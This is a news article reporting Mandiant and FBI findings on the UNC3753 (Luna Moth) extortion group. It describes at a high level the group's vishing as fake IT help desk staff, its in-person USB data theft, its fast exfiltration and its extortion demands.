Extortionists Escalate Tactics: From Vishing to USB Sticks for Data Theft
A sophisticated extortion group, known as UNC3753 or Luna Moth, is employing a dual-pronged attack strategy, combining social engineering via fake help desk calls with physical office visits to steal data using USB drives.
A persistent extortion gang, tracked by Google's Mandiant as UNC3753 and also known by aliases such as Luna Moth, Chatty Spider, and Silent Ransom Group, has been aggressively targeting financial institutions, law firms, and professional services companies across the United States. Operating since at least 2022, the group initially relied on deceptive emails about software renewals to lure victims into calling attacker-controlled call centers. However, a significant shift in tactics occurred around March 2025, when UNC3753 began impersonating IT help desk staff to gain initial access to corporate networks.
While digital vectors remain their primary method, UNC3753 has demonstrated a willingness to escalate their operations to physical intrusions. When remote social engineering fails, the threat actors have been observed visiting victim offices in person, posing as IT technicians. Their objective is to gain direct access to sensitive data, which they then exfiltrate using physical media like USB drives. This physical tactic has been corroborated by an FBI alert concerning the Silent Ransom Group, which has employed similar methods as recently as the spring of 2026.
Once inside a victim's office, the attackers present themselves as IT support personnel needing to perform routine maintenance, such as imaging a device or creating local backups for security purposes. If their ruse is successful, they proceed to plug a USB drive into the target's computer, enabling them to copy sensitive files directly. Mandiant assesses that these physical intrusions are likely linked to UNC3753 due to overlapping targeting, operational timelines, and methodologies, despite the limited forensic evidence available in such cases.
A particularly alarming characteristic of UNC3753's operations is their speed. Mandiant has documented numerous incidents where the entire attack lifecycle, from initial contact to data theft and extortion, was completed within a single day. In some recent cases, the threat actors managed to conduct data searches, stage the exfiltrated information, and complete the theft in under an hour, highlighting the critical need for rapid incident response capabilities.
The initial lure often involves invoice-themed emails that, surprisingly, do not contain malicious links or attachments. Their sole purpose is to establish a pretext for a follow-up phone call, making the subsequent social engineering attempts appear more legitimate. This voice-phishing approach, which has proven successful for other groups like ShinyHunters and Scattered Spider, is a cornerstone of UNC3753's intrusion strategy.
Attackers leverage various communication platforms, including Zoom, Microsoft Teams, and Quick Assist, to conduct screen-sharing sessions, gaining direct control over victim systems. In some instances, UNC3753 has even established sessions on targets' personal laptops, using these compromised machines to pivot into corporate virtual desktop infrastructure (VDI) environments. Once inside, they meticulously map network drives and target specific data repositories, employing precise keyword searches to locate sensitive documents such as tax forms, audit files, client agreements, and personally identifiable information.
Exfiltration of stolen data is conducted using stealthy methods to evade detection. UNC3753 employs tools like portable versions of WinSCP or Rclone, uploads data through compromised browser-based file-sharing accounts, or instructs victims to email files to attacker-controlled addresses. Following data exfiltration, which often occurs within 30 minutes of exiting the victim's environment, the group issues an extortion demand, typically setting a three-day deadline for negotiations before threatening to leak the data and notify employees, partners, and customers.
The potential impact of these attacks is severe, encompassing reputational damage, stock price depreciation, termination of business deals, and legal claims from affected parties. The group's detailed extortion emails explicitly outline the consequences of non-compliance, including public data exposure, regulatory scrutiny, and business collapse, underscoring the critical importance of robust cybersecurity defenses against both digital and physical intrusion vectors.